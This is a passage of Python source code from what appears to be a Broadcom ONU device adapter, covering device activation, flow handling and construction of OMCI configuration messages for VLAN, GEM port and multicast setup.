raise NotImplementedError()
def remove_tcont(self, device, tcont_data, traffic_descriptor_data):
log.info('remove-tcont', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.remove_tcont(tcont_data, traffic_descriptor_data)
def create_gemport(self, device, data):
log.info('create-gemport', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.create_gemport(data)
def update_gemport(self, device, data):
raise NotImplementedError()
def remove_gemport(self, device, data):
log.info('remove-gemport', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.remove_gemport(data)
def create_multicast_gemport(self, device, data):
log.info('create-multicast-gemport', device_id=device.id)
if device.id in self.devices_handlers:
handler = self.devices_handlers[device.id]
if handler is not None:
handler.create_multicast_gemport(data)
def update_multicast_gemport(self, device, data):
raise NotImplementedError()
def remove_multicast_gemport(self, device, data):
raise NotImplementedError()
def create_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def update_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def remove_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def suppress_alarm(self, filter):
raise NotImplementedError()
def unsuppress_alarm(self, filter):
raise NotImplementedError()
class BroadcomOnuHandler(object):
def __init__(self, adapter, device_id):
self.adapter = adapter
self.adapter_agent = adapter.adapter_agent
self.device_id = device_id
self.log = structlog.get_logger(device_id=device_id)
self.incoming_messages = DeferredQueue()
self.event_messages = DeferredQueue()
self.proxy_address = None
self.tx_id = 0
# Need to query ONU for number of supported uni ports
# For now, temporarily set number of ports to 1 - port #2
self.uni_ports = (2,)
# Handle received ONU event messages
reactor.callLater(0, self.handle_onu_events)
def receive_message(self, msg):
self.incoming_messages.put(msg)
@inlineCallbacks
def handle_onu_events(self):
event_msg = yield self.event_messages.get()
if event_msg['event'] == 'activation-completed':
if event_msg['event_data']['activation_successful'] == True:
for uni in self.uni_ports:
port_no = self.proxy_address.channel_id + uni
yield self.message_exchange(
self.proxy_address.onu_id,
self.proxy_address.onu_session_id,
port_no)
device = self.adapter_agent.get_device(self.device_id)
device.connect_status = ConnectStatus.REACHABLE
device.oper_status = OperStatus.ACTIVE
self.adapter_agent.update_device(device)
else:
device = self.adapter_agent.get_device(self.device_id)
device.oper_status = OperStatus.FAILED
self.adapter_agent.update_device(device)
elif event_msg['event'] == 'deactivation-completed':
device = self.adapter_agent.get_device(self.device_id)
device.oper_status = OperStatus.DISCOVERED
self.adapter_agent.update_device(device)
elif event_msg['event'] == 'deactivate-onu':
device = self.adapter_agent.get_device(self.device_id)
device.connect_status = ConnectStatus.UNREACHABLE
device.oper_status = OperStatus.DISCOVERED
self.adapter_agent.update_device(device)
self.disable_ports(device)
elif event_msg['event'] == 'ranging-completed':
if event_msg['event_data']['ranging_successful'] == True:
device = self.adapter_agent.get_device(self.device_id)
device.oper_status = OperStatus.ACTIVATING
self.adapter_agent.update_device(device)
else:
device = self.adapter_agent.get_device(self.device_id)
device.oper_status = OperStatus.FAILED
self.adapter_agent.update_device(device)
# Handle next event
reactor.callLater(0, self.handle_onu_events)
def activate(self, device):
self.log.info('activating')
# first we verify that we got parent reference and proxy info
assert device.parent_id
assert device.proxy_address.device_id
#assert device.proxy_address.channel_id # c-vid
# register for proxied messages right away
self.proxy_address = device.proxy_address
self.adapter_agent.register_for_proxied_messages(device.proxy_address)
# populate device info
device.root = True
device.vendor = 'Broadcom'
device.model = 'n/a'
device.hardware_version = 'to be filled'
device.firmware_version = 'to be filled'
device.images.image.extend([
Image(version="to be filled")
])
device.connect_status = ConnectStatus.REACHABLE
self.adapter_agent.update_device(device)
self.adapter_agent.add_port(device.id, Port(
port_no=100,
label='PON port',
type=Port.PON_ONU,
admin_state=AdminState.ENABLED,
oper_status=OperStatus.ACTIVE,
peers=[
Port.PeerPort(
device_id=device.parent_id,
port_no=device.parent_port_no
)
]
))
parent_device = self.adapter_agent.get_device(device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
device = self.adapter_agent.get_device(device.id)
device.oper_status = OperStatus.DISCOVERED
self.adapter_agent.update_device(device)
def reconcile(self, device):
self.log.info('reconciling-broadcom-onu-device-starts')
# first we verify that we got parent reference and proxy info
assert device.parent_id
assert device.proxy_address.device_id
# register for proxied messages right away
self.proxy_address = device.proxy_address
self.adapter_agent.register_for_proxied_messages(device.proxy_address)
# TODO: Query ONU current status after reconcile and update.
# To be addressed in future commits.
self.log.info('reconciling-broadcom-onu-device-ends')
def update_logical_port(self, logical_device_id, port_id, state):
self.log.info('updating-logical-port', logical_port_id=port_id,
logical_device_id=logical_device_id, state=state)
logical_port = self.adapter_agent.get_logical_port(logical_device_id,
port_id)
logical_port.ofp_port.state = state
self.adapter_agent.update_logical_port(logical_device_id,
logical_port)
def delete(self, device):
self.log.info('delete-onu')
# The device is already deleted in delete_v_ont_ani(). No more
# handling needed here
@inlineCallbacks
def update_flow_table(self, device, flows):
#
# We need to proxy through the OLT to get to the ONU
# Configuration from here should be using OMCI
#
#self.log.info('bulk-flow-update', device_id=device.id, flows=flows)
def is_downstream(port):
return port == 100 # Need a better way
def is_upstream(port):
return not is_downstream(port)
for flow in flows:
_type = None
_port = None
_vlan_vid = None
_udp_dst = None
_udp_src = None
_ipv4_dst = None
_ipv4_src = None
_metadata = None
_output = None
_push_tpid = None
_field = None
_set_vlan_vid = None
self.log.info('bulk-flow-update', device_id=device.id, flow=flow)
try:
_in_port = fd.get_in_port(flow)
assert _in_port is not None
if is_downstream(_in_port):
self.log.info('downstream-flow')
elif is_upstream(_in_port):
self.log.info('upstream-flow')
else:
raise Exception('port should be 1 or 2 by our convention')
_out_port = fd.get_out_port(flow) # may be None
self.log.info('out-port', out_port=_out_port)
for field in fd.get_ofb_fields(flow):
if field.type == fd.ETH_TYPE:
_type = field.eth_type
self.log.info('field-type-eth-type',
eth_type=_type)
elif field.type == fd.IP_PROTO:
_proto = field.ip_proto
self.log.info('field-type-ip-proto',
ip_proto=_proto)
elif field.type == fd.IN_PORT:
_port = field.port
self.log.info('field-type-in-port',
in_port=_port)
elif field.type == fd.VLAN_VID:
_vlan_vid = field.vlan_vid & 0xfff
self.log.info('field-type-vlan-vid',
vlan=_vlan_vid)
elif field.type == fd.VLAN_PCP:
_vlan_pcp = field.vlan_pcp
self.log.info('field-type-vlan-pcp',
pcp=_vlan_pcp)
elif field.type == fd.UDP_DST:
_udp_dst = field.udp_dst
self.log.info('field-type-udp-dst',
udp_dst=_udp_dst)
elif field.type == fd.UDP_SRC:
_udp_src = field.udp_src
self.log.info('field-type-udp-src',
udp_src=_udp_src)
elif field.type == fd.IPV4_DST:
_ipv4_dst = field.ipv4_dst
self.log.info('field-type-ipv4-dst',
ipv4_dst=_ipv4_dst)
elif field.type == fd.IPV4_SRC:
_ipv4_src = field.ipv4_src
self.log.info('field-type-ipv4-src',
ipv4_dst=_ipv4_src)
elif field.type == fd.METADATA:
_metadata = field.table_metadata
self.log.info('field-type-metadata',
metadata=_metadata)
else:
raise NotImplementedError('field.type={}'.format(
field.type))
for action in fd.get_actions(flow):
if action.type == fd.OUTPUT:
_output = action.output.port
self.log.info('action-type-output',
output=_output, in_port=_in_port)
elif action.type == fd.POP_VLAN:
self.log.info('action-type-pop-vlan',
in_port=_in_port)
elif action.type == fd.PUSH_VLAN:
_push_tpid = action.push.ethertype
self.log.info('action-type-push-vlan',
push_tpid=_push_tpid, in_port=_in_port)
if action.push.ethertype != 0x8100:
self.log.error('unhandled-tpid',
ethertype=action.push.ethertype)
elif action.type == fd.SET_FIELD:
_field = action.set_field.field.ofb_field
assert (action.set_field.field.oxm_class ==
OFPXMC_OPENFLOW_BASIC)
self.log.info('action-type-set-field',
field=_field, in_port=_in_port)
if _field.type == fd.VLAN_VID:
_set_vlan_vid = _field.vlan_vid & 0xfff
self.log.info('set-field-type-valn-vid', _set_vlan_vid)
else:
self.log.error('unsupported-action-set-field-type',
field_type=_field.type)
else:
self.log.error('unsupported-action-type',
action_type=action.type, in_port=_in_port)
#
# All flows created from ONU adapter should be OMCI based
#
if _vlan_vid == 0 and _set_vlan_vid != None and _set_vlan_vid != 0:
# allow priority tagged packets
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to priority tagged pkts - c-vid
self.send_delete_vlan_tagging_filter_data(0x2102)
yield self.wait_for_response()
#self.send_set_vlan_tagging_filter_data(0x2102, _set_vlan_vid)
self.send_create_vlan_tagging_filter_data(0x2102, _set_vlan_vid)
yield self.wait_for_response()
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_untagged(0x202, 0x1000, _set_vlan_vid)
yield self.wait_for_response()
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(0x202, 8, 0, 0,
1, 8, _set_vlan_vid)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to priority tagged pkts - c-vid
'''
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(0x205, 8, 0, 0,
1, 8, _set_vlan_vid)
yield self.wait_for_response()
'''
except Exception as e:
self.log.exception('failed-to-install-flow', e=e, flow=flow)
def get_tx_id(self):
self.tx_id += 1
return self.tx_id
def send_omci_message(self, frame):
_frame = hexify(str(frame))
self.log.info('send-omci-message-%s' % _frame)
device = self.adapter_agent.get_device(self.device_id)
try:
self.adapter_agent.send_proxied_message(device.proxy_address, _frame)
except Exception as e:
self.log.info('send-omci-message-exception', exc=str(e))
def send_get_circuit_pack(self, entity_id=0):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciGet.message_id,
omci_message=OmciGet(
entity_class=CircuitPack.class_id,
entity_id=entity_id,
attributes_mask=CircuitPack.mask_for('vendor_id')
)
)
self.send_omci_message(frame)
def send_mib_reset(self, entity_id=0):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciMibReset.message_id,
omci_message=OmciMibReset(
entity_class=OntData.class_id,
entity_id=entity_id
)
)
self.send_omci_message(frame)
def send_create_gal_ethernet_profile(self,
entity_id,
max_gem_payload_size):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=GalEthernetProfile.class_id,
entity_id=entity_id,
data=dict(
max_gem_payload_size=max_gem_payload_size
)
)
)
self.send_omci_message(frame)
def send_set_admin_state(self,
entity_id,
admin_state):
data = dict(
administrative_state=admin_state
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=OntG.class_id,
entity_id=entity_id,
attributes_mask=OntG.mask_for(*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_tcont(self,
entity_id,
alloc_id):
data = dict(
alloc_id=alloc_id
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=Tcont.class_id,
entity_id=entity_id,
attributes_mask=Tcont.mask_for(*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_create_8021p_mapper_service_profile(self,
entity_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=Ieee8021pMapperServiceProfile.class_id,
entity_id=entity_id,
data=dict(
tp_pointer=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_0=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_1=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_2=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_3=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_4=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_5=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_6=OmciNullPointer,
interwork_tp_pointer_for_p_bit_priority_7=OmciNullPointer
)
)
)
self.send_omci_message(frame)
def send_create_mac_bridge_service_profile(self,
entity_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=MacBridgeServiceProfile.class_id,
entity_id=entity_id,
data=dict(
spanning_tree_ind=False,
learning_ind=True,
priority=0x8000,
max_age=20 * 256,
hello_time=2 * 256,
forward_delay=15 * 256,
unknown_mac_address_discard=True
)
)
)
self.send_omci_message(frame)
def send_create_gem_port_network_ctp(self,
entity_id,
port_id,
tcont_id,
direction,
tm):
_directions = {"upstream": 1, "downstream": 2, "bi-directional": 3}
if _directions.has_key(direction):
_direction = _directions[direction]
else:
self.log.error('invalid-gem-port-direction', direction=direction)
raise ValueError('Invalid GEM port direction: {_dir}'.format(_dir=direction))
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=GemPortNetworkCtp.class_id,
entity_id=entity_id,
data=dict(
port_id=port_id,
tcont_pointer=tcont_id,
direction=_direction,
traffic_management_pointer_upstream=tm
)
)
)
self.send_omci_message(frame)
def send_create_multicast_gem_interworking_tp(self,
entity_id,
gem_port_net_ctp_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=MulticastGemInterworkingTp.class_id,
entity_id=entity_id,
data=dict(
gem_port_network_ctp_pointer=gem_port_net_ctp_id,
interworking_option=0,
service_profile_pointer=0x1
)
)
)
self.send_omci_message(frame)
def send_create_gem_inteworking_tp(self,
entity_id,
gem_port_net_ctp_id,
service_profile_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=GemInterworkingTp.class_id,
entity_id=entity_id,
data=dict(
gem_port_network_ctp_pointer=gem_port_net_ctp_id,
interworking_option=5,
service_profile_pointer=service_profile_id,
interworking_tp_pointer=0x0,
gal_profile_pointer=0x1
)
)
)
self.send_omci_message(frame)
def send_delete_omci_mesage(self,
class_id,
entity_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciDelete.message_id,
omci_message=OmciDelete(
entity_class=class_id,
entity_id=entity_id
)
)
self.send_omci_message(frame)
def send_set_8021p_mapper_service_profile(self,
entity_id,
interwork_tp_id):
data = dict(
interwork_tp_pointer_for_p_bit_priority_0=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_1=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_2=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_3=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_4=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_5=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_6=interwork_tp_id,
interwork_tp_pointer_for_p_bit_priority_7=interwork_tp_id
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=Ieee8021pMapperServiceProfile.class_id,
entity_id=entity_id,
attributes_mask=Ieee8021pMapperServiceProfile.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_create_mac_bridge_port_configuration_data(self,
entity_id,
bridge_id,
port_id,
tp_type,
tp_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=MacBridgePortConfigurationData.class_id,
entity_id=entity_id,
data=dict(
bridge_id_pointer=bridge_id,
port_num=port_id,
tp_type=tp_type,
tp_pointer=tp_id
)
)
)
self.send_omci_message(frame)
def send_create_vlan_tagging_filter_data(self,
entity_id,
vlan_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=VlanTaggingFilterData.class_id,
entity_id=entity_id,
data=dict(
vlan_filter_0=vlan_id,
forward_operation=0x10,
number_of_entries=1
)
)
)
self.send_omci_message(frame)
def send_set_vlan_tagging_filter_data(self,
entity_id,
vlan_id):
data = dict(
vlan_filter_0=vlan_id,
forward_operation=0x10,
number_of_entries=1
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=VlanTaggingFilterData.class_id,
entity_id=entity_id,
attributes_mask=VlanTaggingFilterData.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_delete_vlan_tagging_filter_data(self,
entity_id):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciDelete.message_id,
omci_message=OmciDelete(
entity_class=VlanTaggingFilterData.class_id,
entity_id=entity_id
)
)
self.send_omci_message(frame)
def send_create_extended_vlan_tagging_operation_configuration_data(self,
entity_id,
assoc_type,
assoc_me):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=
ExtendedVlanTaggingOperationConfigurationData.class_id,
entity_id=entity_id,
data=dict(
association_type=assoc_type,
associated_me_pointer=assoc_me
)
)
)
self.send_omci_message(frame)
def send_set_extended_vlan_tagging_operation_tpid_configuration_data(self,
entity_id,
input_tpid,
output_tpid):
data = dict(
input_tpid=input_tpid,
output_tpid=output_tpid,
downstream_mode=0, # inverse of upstream
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=
ExtendedVlanTaggingOperationConfigurationData.class_id,
entity_id=entity_id,
attributes_mask=
ExtendedVlanTaggingOperationConfigurationData.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_extended_vlan_tagging_operation_vlan_configuration_data_untagged(self,
entity_id,
filter_inner_vid,
treatment_inner_vid):
data = dict(
received_frame_vlan_tagging_operation_table=
VlanTaggingOperation(
filter_outer_priority=15,
filter_outer_vid=4096,
filter_outer_tpid_de=0,
filter_inner_priority=15,
filter_inner_vid=filter_inner_vid,
filter_inner_tpid_de=0,
filter_ether_type=0,
treatment_tags_to_remove=0,
treatment_outer_priority=15,
treatment_outer_vid=0,
treatment_outer_tpid_de=0,
treatment_inner_priority=0,
treatment_inner_vid=treatment_inner_vid,
treatment_inner_tpid_de=4
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=
ExtendedVlanTaggingOperationConfigurationData.class_id,
entity_id=entity_id,
attributes_mask=
ExtendedVlanTaggingOperationConfigurationData.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(self,
entity_id,
filter_inner_priority,
filter_inner_vid,
filter_inner_tpid_de,
treatment_tags_to_remove,
treatment_inner_priority,
treatment_inner_vid):
data = dict(
received_frame_vlan_tagging_operation_table=
VlanTaggingOperation(
filter_outer_priority=15,
filter_outer_vid=4096,
filter_outer_tpid_de=0,
filter_inner_priority=filter_inner_priority,
filter_inner_vid=filter_inner_vid,
filter_inner_tpid_de=filter_inner_tpid_de,
filter_ether_type=0,
treatment_tags_to_remove=treatment_tags_to_remove,
treatment_outer_priority=15,
treatment_outer_vid=0,
treatment_outer_tpid_de=0,
treatment_inner_priority=treatment_inner_priority,
treatment_inner_vid=treatment_inner_vid,
treatment_inner_tpid_de=4
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=
ExtendedVlanTaggingOperationConfigurationData.class_id,
entity_id=entity_id,
attributes_mask=
ExtendedVlanTaggingOperationConfigurationData.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_create_multicast_operations_profile(self,
entity_id,
igmp_ver):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=
MulticastOperationsProfile.class_id,
entity_id=entity_id,
data=dict(
igmp_version=igmp_ver,
igmp_function=0,
immediate_leave=0
)
)
)
self.send_omci_message(frame)
def send_set_multicast_operations_profile_acl_row0(self,
entity_id,
acl_table,
row_key,
gem_port,
vlan,
src_ip,
dst_ip_start,
dst_ip_end):
row0 = AccessControlRow0(
set_ctrl=1,
row_part_id=0,
test=0,
row_key=row_key,
gem_port_id=gem_port,
vlan_id=vlan,
src_ip=src_ip,
dst_ip_start=dst_ip_start,
dst_ip_end=dst_ip_end,
ipm_group_bw=0
)
if acl_table == 'dynamic':
data = dict(
dynamic_access_control_list_table=row0
)
else:
data = dict(
static_access_control_list_table=row0
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastOperationsProfile.class_id,
entity_id=entity_id,
attributes_mask=MulticastOperationsProfile.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_multicast_operations_profile_ds_igmp_mcast_tci(self,
entity_id,
ctrl_type,
tci):
data = dict(
ds_igmp_mcast_tci=
DownstreamIgmpMulticastTci(
ctrl_type=ctrl_type,
tci=tci
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastOperationsProfile.class_id,
entity_id=entity_id,
attributes_mask=MulticastOperationsProfile.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_create_multicast_subscriber_config_info(self,
entity_id,
me_type,
mcast_oper_profile):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciCreate.message_id,
omci_message=OmciCreate(
entity_class=
MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
data=dict(
me_type=me_type,
mcast_operations_profile_pointer=mcast_oper_profile
)
)
)
self.send_omci_message(frame)
def send_set_multicast_subscriber_config_info(self,
entity_id,
max_groups=0,
max_mcast_bw=0,
bw_enforcement=0):
data = dict(
max_simultaneous_groups=max_groups,
max_multicast_bandwidth=max_mcast_bw,
bandwidth_enforcement=bw_enforcement
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
attributes_mask=MulticastSubscriberConfigInfo.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_multicast_service_package(self,
entity_id,
row_key,
vid_uni,
max_groups,
max_mcast_bw,
mcast_oper_profile):
data = dict(
multicast_service_package_table=
MulticastServicePackage(
set_ctrl=1,
row_key=row_key,
vid_uni=vid_uni,
max_simultaneous_groups=max_groups,
max_multicast_bw=max_mcast_bw,
mcast_operations_profile_pointer=mcast_oper_profile
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
attributes_mask=MulticastSubscriberConfigInfo.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_multicast_allowed_preview_groups_row0(self,
entity_id,
row_key,
src_ip,
vlan_id_ani,
vlan_id_uni):
data = dict(
allowed_preview_groups_table=
AllowedPreviewGroupsRow0(
set_ctrl=1,
row_part_id=0,
row_key=row_key,
src_ip=src_ip,
vlan_id_ani=vlan_id_ani,
vlan_id_uni=vlan_id_uni
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
attributes_mask=MulticastSubscriberConfigInfo.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_set_multicast_allowed_preview_groups_row1(self,
entity_id,
row_key,
dst_ip,
duration,
time_left):
data = dict(
allowed_preview_groups_table=
AllowedPreviewGroupsRow1(
set_ctrl=1,
row_part_id=1,
row_key=row_key,
dst_ip=dst_ip,
duration=duration,
time_left=time_left
)
)
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciSet.message_id,
omci_message=OmciSet(
entity_class=MulticastSubscriberConfigInfo.class_id,
entity_id=entity_id,
attributes_mask=MulticastSubscriberConfigInfo.mask_for(
*data.keys()),
data=data
)
)
self.send_omci_message(frame)
def send_reboot(self):
frame = OmciFrame(
transaction_id=self.get_tx_id(),
message_type=OmciReboot.message_id,
omci_message=OmciReboot(
entity_class=OntG.class_id,
entity_id=0
)
)
self.send_omci_message(frame)
@inlineCallbacks
def wait_for_response(self):
self.log.info('wait-for-response')
try:
response = yield self.incoming_messages.get()
self.log.info('got-response')
resp = OmciFrame(response)
resp.show()
returnValue(resp)
except Exception as e:
returnValue(None)
self.log.info('wait-for-response-exception', exc=str(e))
@inlineCallbacks
def message_exchange(self, onu, gem, cvid):
self.log.info('message_exchange', onu=onu, gem=gem, cvid=cvid)
# reset incoming message queue
while self.incoming_messages.pending:
_ = yield self.incoming_messages.get()
cvid = BRDCM_DEFAULT_VLAN
# construct message
# MIB Reset - OntData - 0
self.send_mib_reset()
yield self.wait_for_response()
# Create AR - GalEthernetProfile - 1
self.send_create_gal_ethernet_profile(1, 48)
yield self.wait_for_response()
# Port 2
# Extended VLAN Tagging Operation config
# Create AR - ExtendedVlanTaggingOperationConfigData - 514 - 2 - 0x102(Uni-Port-Num)
# TODO: add entry here for additional UNI interfaces
self.send_create_extended_vlan_tagging_operation_configuration_data(0x202, 2, 0x102)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData - 514 - 8100 - 8100
self.send_set_extended_vlan_tagging_operation_tpid_configuration_data(0x202, 0x8100, 0x8100)
yield self.wait_for_response()
# MAC Bridge Service config
# Create AR - MacBridgeServiceProfile - 513
self.send_create_mac_bridge_service_profile(0x201)
yield self.wait_for_response()
# Create AR - MacBridgePortConfigData - Entity_id -
# bridge ID -
# port num -
# tp_type -
# IEEE MApper poniter
self.send_create_mac_bridge_port_configuration_data(0x201, 0x201, 2, 1, 0x102)
yield self.wait_for_response()
# Mapper Service config
# Create AR - 802.1pMapperServiceProfile - 32769
self.send_create_8021p_mapper_service_profile(0x8001)
yield self.wait_for_response()
# MAC Bridge Port config
# Create AR - MacBridgePortConfigData - 8450 - 513 - 3 - 3 - 32769
self.send_create_mac_bridge_port_configuration_data(0x2102, 0x201, 3, 3, 0x8001)
yield self.wait_for_response()
# VLAN Tagging Filter config
# Create AR - VlanTaggingFilterData - 8450 - c-vid
self.send_create_vlan_tagging_filter_data(0x2102, cvid)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to priority tagged pkts - c-vid
#self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(0x202, 8, 0, 0, 1, 8, cvid)
#yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to untagged pkts - c-vid
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_untagged(0x202, 0x1000, cvid)
yield self.wait_for_response()
# Multicast related MEs
# Set AR - MulticastOperationsProfile - Dynamic Access Control List table
# Create AR - MacBridgePortConfigData - 9000 - 513 - 6 - 6 - 6
self.send_create_mac_bridge_port_configuration_data(0x2328, 0x201, 6, 6, 6)
yield self.wait_for_response()
# Multicast Operation Profile config
# Create AR - MulticastOperationsProfile
self.send_create_multicast_operations_profile(0x201, 3)
yield self.wait_for_response()
# Multicast Subscriber config
# Create AR - MulticastSubscriberConfigInfo
self.send_create_multicast_subscriber_config_info(0x201, 0, 0x201)
yield self.wait_for_response()
# Create AR - GemPortNetworkCtp - 260 - 4000 - 0 Multicast
self.send_create_gem_port_network_ctp(0x104, 0x0FA0, 0, "downstream", 0)
yield self.wait_for_response()
# Multicast GEM Interworking config Multicast
# Create AR - MulticastGemInterworkingTp - 6 - 260
self.send_create_multicast_gem_interworking_tp(0x6, 0x104)
yield self.wait_for_response()
self.send_set_multicast_operations_profile_acl_row0(0x201,
'dynamic',
0,
0x0fa0,
0x0fa0,
'0.0.0.0',
'172.16.58.3',
'172.16.58.3')
yield self.wait_for_response()
# Multicast Operation Profile config
# Set AR - MulticastOperationsProfile - Downstream IGMP Multicast TCI
self.send_set_multicast_operations_profile_ds_igmp_mcast_tci(0x201, 4, cvid)
yield self.wait_for_response()
'''
# Port 5
# Extended VLAN Tagging Operation config
# Create AR - ExtendedVlanTaggingOperationConfigData - 514 - 2 - 0x102
# TODO: add entry here for additional UNI interfaces
self.send_create_extended_vlan_tagging_operation_configuration_data(0x205, 2, 0x105)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData - 514 - 8100 - 8100
self.send_set_extended_vlan_tagging_operation_tpid_configuration_data(0x205, 0x8100, 0x8100)
yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to priority tagged pkts - c-vid
#self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_single_tag(0x205, 8, 0, 0, 1, 8, cvid)
#yield self.wait_for_response()
# Set AR - ExtendedVlanTaggingOperationConfigData
# 514 - RxVlanTaggingOperationTable - add VLAN <cvid> to untagged pkts - c-vid
self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_untagged(0x205, 0x1000, cvid)
yield self.wait_for_response()
# MAC Bridge Port config
# Create AR - MacBridgePortConfigData - 513 - 513 - 1 - 1 - 0x102
# TODO: add more entries here for other UNI ports
self.send_create_mac_bridge_port_configuration_data(0x205, 0x201, 5, 1, 0x105)
yield self.wait_for_response()
'''
def add_uni_port(self, device, parent_logical_device_id,
name, parent_port_num=None):
self.log.info('adding-logical-port', device_id=device.id,
logical_device_id=parent_logical_device_id,
name=name)
if parent_port_num is not None:
uni = parent_port_num
port_no = parent_port_num
else:
uni = self.uni_ports[0]
port_no = device.proxy_address.channel_id + uni
# register physical ports
